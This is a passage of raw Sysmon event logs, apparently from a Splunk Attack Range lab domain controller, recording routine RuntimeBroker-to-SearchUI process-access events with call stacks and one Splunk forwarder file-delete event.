10341000x80000000000000001694512Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.676{05ADC7E1-29F2-6039-CB05-00000000AD01}42807288C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694511Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.676{05ADC7E1-29F2-6039-CB05-00000000AD01}42807288C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694510Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.676{05ADC7E1-29F2-6039-CB05-00000000AD01}42807288C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694509Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.676{05ADC7E1-29F2-6039-CB05-00000000AD01}42802624C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694508Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.652{05ADC7E1-29F2-6039-CB05-00000000AD01}42803880C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694507Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.652{05ADC7E1-29F2-6039-CB05-00000000AD01}42803880C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694506Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.652{05ADC7E1-29F2-6039-CB05-00000000AD01}42802624C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694505Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.652{05ADC7E1-29F2-6039-CB05-00000000AD01}42809192C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694504Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.652{05ADC7E1-29F2-6039-CB05-00000000AD01}42802624C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694503Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.652{05ADC7E1-29F2-6039-CB05-00000000AD01}42809192C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694502Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.652{05ADC7E1-29F2-6039-CB05-00000000AD01}42803880C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694501Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.652{05ADC7E1-29F2-6039-CB05-00000000AD01}42803880C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x80000000000000001694500Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.647{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CE29F91211066F0B9F646FB15974DE6,SHA256=D2A5A1F9E7200B09D4A6FAE4308888C03A5560ED3BC10BB4E1814F7EAB995450,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001694499Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.645{05ADC7E1-29F2-6039-CB05-00000000AD01}42807288C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001694498Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.629{05ADC7E1-29F2-6039-CB05-00000000AD01}42807288C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694497Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.629{05ADC7E1-29F2-6039-CB05-00000000AD01}42807288C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694496Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.629{05ADC7E1-29F2-6039-CB05-00000000AD01}42807288C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694495Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.629{05ADC7E1-29F2-6039-CB05-00000000AD01}42803880C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000001694494Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.629{05ADC7E1-29F2-6039-CB05-00000000AD01}42802624C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000001694493Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:56.629{05ADC7E1-29F2-6039-CB05-00000000AD01}42802624C:\Windows\System32\RuntimeBroker.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+670db|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+afc5a|C:\Windows\System32\combase.dll+a6a1d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+280f|C:\Windows\System32\combase.dll+6a233|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\